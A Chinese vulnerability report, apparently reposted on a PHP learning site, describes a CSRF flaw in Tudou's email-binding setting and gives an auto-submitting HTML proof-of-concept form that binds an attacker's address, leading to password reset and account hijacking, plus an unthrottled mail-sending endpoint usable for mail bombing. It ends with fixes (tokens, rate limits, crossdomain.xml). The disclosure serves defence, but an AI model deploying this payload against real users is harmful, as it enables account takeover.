网站地图    收藏   

主页 > 后端 > 网站安全 >

土豆网邮箱绑定csrf(可导致劫持账号) - 网站安

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] 这是问题页面~顺带一个比较糟糕的问题,这里没有设置邮件发送间隔的时间哦,相当于发动技能无cd。看吧刷屏了,可以做炸弹神马的哦。言归正传,先抓个包木有token哦客官。pochtmlb...

这是问题页面~



顺带一个比较糟糕的问题,这里没有设置邮件发送间隔的时间哦,相当于发动技能无cd。


看吧刷屏了,可以做炸弹神马的哦。

言归正传,先抓个包



木有token哦客官。

poc

 

<html>
<body>
<form id="tudou" name="tudou" action="http://www.tudou.com/my/setting/private.action" method="POST">
<input type="hidden" name="email" value="***@163.com" />
<input type="submit" value="submit" />
</form>
<script>
   document.tudou.submit();
</script>
</body>
</html>


提交后返回一个已发送的页面,其实可以构造的更隐蔽,未进一步深入。

然后就上传页面到服务器,诱惑用户访问,pia一声就会有验证邮件了哦。

更糟糕的是绑定后就可以重置密码了,然后就是劫持账户,然后……
 





修复方案

加token,增加发邮件的间隔时间,还有土豆的crossdomain.xml设置不当,给跨域提供了可能性,你家优酷的就设置的挺好的

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论